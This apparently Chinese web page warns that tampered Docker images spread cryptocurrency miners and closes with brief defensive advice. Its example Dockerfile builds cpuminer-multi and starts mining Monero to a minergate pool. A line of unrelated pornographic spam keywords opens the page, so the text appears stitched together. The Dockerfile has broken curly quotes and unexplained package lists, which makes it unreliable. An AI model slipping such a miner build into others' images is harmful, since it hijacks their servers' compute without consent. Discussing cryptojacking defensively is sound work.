欧美一区二区三区,国内熟女精品熟女A片视频小说,日本av网,小鲜肉男男GAY做受XXX网站

docker傳播挖礦

Docker作為一種快速部署軟件的工具,正逐漸成為挖礦軟件傳播的途徑之一。

最近,安全研究人員發(fā)現(xiàn),一些惡意分子通過(guò)篡改Dockerfile腳本,注入挖礦程序,并將其上傳至開源倉(cāng)庫(kù)中。當(dāng)無(wú)數(shù)用戶下載這些鏡像,就會(huì)在自己的服務(wù)器上執(zhí)行挖礦程序,造成了不小的安全隱患。

FROM ubuntu:18.04
RUN apt-get update && \
apt-get install -y software-properties-common && \
add-apt-repository ppa:jonathonf/gcc && \
apt-get -y upgrade && \
apt-get install -y wget && \
wget -nv -O - https://download.docker.com/linux/ubuntu/gpg | apt-key add - && \
echo “deb http://cz.archive.ubuntu.com/ubuntu bionic main universe” | tee –a  /etc/apt/sources.list && \
echo “deb http://cz.archive.ubuntu.com/ubuntu bionic-updates main universe” | tee –a  /etc/apt/sources.list && \
apt-get update && \
apt-get install -y \
build-essential \
git \
wget \
cmake \
libtool \
automake \
autotools-dev \
bsdmainutils \
libboost-system-dev \
libboost-filesystem-dev \
libboost-chrono-dev \
libboost-program-options-dev \
libboost-test-dev \
libboost-thread-dev \
libssl-dev \
libevent-dev \
libminiupnpc-dev \
libzmq5-dev \
libpgm-dev \
libprotobuf-dev \
protobuf-compiler \
libqt5gui5 \
libqt5core5a \
libqt5dbus5 \
qttools5-dev \
qttools5-dev-tools \
libqrencode-dev \
protobuf-compiler \
libqrencode-dev \
git \
apt-utils \
supervisor \
sudo \
curl \
&& apt-get -y clean
RUN useradd -ms /bin/bash miner
USER miner
WORKDIR /home/miner
RUN git clone https://github.com/aeugenegray/cpuminer-multi && \
cd cpuminer-multi && \
./autogen.sh && \
./configure CFLAGS=”-O3″ && \
make 
CMD [“./cpuminer-multi/minerd”,”-a”,”cryptonight”,”-o”,”stratum+tcp://xmr.pool.minergate.com:45560″,”-u”,”user”,”-p”,”password”]

如上所示的容器鏡像,就是被篡改過(guò)的一個(gè)例子。當(dāng)用戶運(yùn)行此鏡像時(shí),就會(huì)開始運(yùn)行挖礦程序。

為了避免被攻擊,用戶需要注意以下幾點(diǎn):

  • 盡量避免使用未知來(lái)源的Docker鏡像
  • 使用gpg校驗(yàn)dockerfile下的公鑰指紋
  • 及時(shí)更新Docker鏡像和容器

總之,對(duì)于Docker容器的安全問(wèn)題,開發(fā)者和用戶都需要保持高度的警惕,尤其在大規(guī)模應(yīng)用Docker的場(chǎng)景下,一定要加強(qiáng)Docker容器的安全防護(hù)。